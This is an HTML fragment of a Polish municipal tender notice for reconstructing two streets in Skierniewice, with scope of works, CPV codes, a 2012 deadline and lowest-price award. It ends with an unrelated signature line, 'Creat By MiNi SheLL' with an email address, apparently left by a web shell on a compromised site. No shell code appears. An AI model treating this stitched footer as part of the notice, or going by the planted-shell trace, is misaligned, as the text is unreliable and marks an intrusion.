<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa ul. B. Prusa przy budynkach nr 2, 4 i 6 oraz odcinka ulicy Iwaszkiewicza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Orientacyjny zakres inwestycji pn.: Przebudowa ul. B. Prusa przy budynkach nr 2, 4 i 6 oraz odcinka ulicy Iwaszkiewicza
             a) długość projektowanego odcinka ulicy wynosi ok.326 m,
      b) zakres robót obejmuje:
-	roboty rozbiórkowe istniejących nawierzchni i elementów drogowych (nawierzchni,            podbudów, krawężników, obrzeży itp.),
-	roboty ziemne,
-	wykonanie podbudowy i nawierzchni: jezdni ulicy, zatok parkingowych, chodników, wysp dzielących itp.,   
-	przebudowa skrzyżowania ulic na skrzyżowanie typu rondo,
-	wykonanie oznakowania pionowego i poziomego,
-	przebudowa wodociągu dł. ok. 36 m,
-	wykonanie kanalizacji deszczowej dł. ok. 170 m, z przykanalikami i wpustami, 
-	przebudowa oświetlenia ulicznego i linii elektroenergetycznej doziemnej-dł.ok. 125 m.

Zamawiający zastrzega, że kanalizacja deszczowa w ulicy Iwaszkiewicza powinna być wykonana przed przebudową wodociągu.
Wykonawca zobowiązany jest udzielić co najmniej 48 miesięcznej gwarancji na wykonane  roboty budowlane.

Szczegółowy opis zamówienia został zawarty w dokumentacjach projektowych na wykonanie zadania oraz w Specyfikacjach Technicznych, które są dostępne w Wydziale Dróg i Komunikacji Urzędu Miasta Skierniewice przy ul. Floriana 9 w pokoju nr 12  oraz na stronie internetowej BIP UM Skierniewice.
Uwaga!
Tam, gdzie w opracowaniu zostały wskazane normy, aprobaty, specyfikacje   i systemy,  o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza oferowanie rozwiązań RÓWNOWAŻNYCH. Wykonawca, który powołuje się na rozwiązania równoważne opisane przez Zamawiającego, jest obowiązany wykazać, że oferowane dostawy, spełniają wymagania określone przez Zamawiającego. 
Dopuszcza się innych producentów materiałów budowlanych, niż podani w opracowaniu, pod warunkiem zagwarantowania RÓWNORZĘDNYCH parametrów technicznych i technologicznych oraz zgodności z obowiązującymi wymaganiami prawnymi oraz w porozumieniu z projektantem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.11.13.00-1, 45.11.20.00-5, 45.11.10.00-8, 45.23.00.00-8, 45.23.11.10-9, 45.23.31.24-4, 45.23.33.20-8, 45.23.32.20-7, 45.23.13.00-8, 45.23.32.90-8, 45.23.32.21-4, 45.23.14.00-9, 45.31.53.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ulicy Moniuszki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Orientacyjny zakres inwestycji pn.: Przebudowa ulicy Moniuszki 
             a) długość projektowanego odcinka ulicy wynosi ok.222 m,
      b) zakres robót obejmuje:
-	roboty rozbiórkowe istniejących nawierzchni i elementów drogowych (nawierzchni, podbudów, krawężników, obrzeży itp.),
-	ścinanie drzew i krzewów, 
-	roboty ziemne,
-	wykonanie podbudowy i nawierzchni jezdni ulicy, chodników,    
-	wykonanie oznakowania pionowego i poziomego,
-	wykonanie kanalizacji deszczowej dł. ok. 230 m, z przykanalikami i wpustami.
Zamawiający informuje, że dokumentacja projektowa obejmuje wykonanie robót budowlanych w ulicach: Willowej, Wieniawskiego i Moniuszki. Roboty budowlane w ulicach Willowej i Wieniawskiego zostały wykonane wcześniej, natomiast przedmiot zamówienia jest określony szczegółowo przez przedmiar robót i wykaz cen.
Wykonawca zobowiązany jest udzielić co najmniej 48 miesięcznej gwarancji na wykonane  roboty budowlane.

 Szczegółowy opis zamówienia został zawarty w dokumentacjach projektowych na wykonanie zadania oraz w Specyfikacjach Technicznych, które są dostępne w Wydziale Dróg i Komunikacji Urzędu Miasta Skierniewice przy ul. Floriana 9 w pokoju nr 12  oraz na stronie internetowej BIP UM Skierniewice.
Uwaga!
Tam, gdzie w opracowaniu zostały wskazane normy, aprobaty, specyfikacje   i systemy,  o których mowa w art. 30 ust. 1 - 3 ustawy Pzp, Zamawiający dopuszcza oferowanie rozwiązań RÓWNOWAŻNYCH. Wykonawca, który powołuje się na rozwiązania równoważne opisane przez Zamawiającego, jest obowiązany wykazać, że oferowane dostawy, spełniają wymagania określone przez Zamawiającego. 
Dopuszcza się innych producentów materiałów budowlanych, niż podani w opracowaniu, pod warunkiem zagwarantowania RÓWNORZĘDNYCH parametrów technicznych i technologicznych oraz zgodności z obowiązującymi wymaganiami prawnymi oraz w porozumieniu z projektantem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.11.13.00-1, 45.11.20.00-5, 45.11.10.00-8, 45.23.00.00-8, 45.23.11.10-9, 45.23.31.24-4, 45.23.33.20-8, 45.23.32.20-7, 45.23.13.00-8, 45.23.32.90-8, 45.23.32.21-4, 45.23.14.00-9, 45.31.53.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com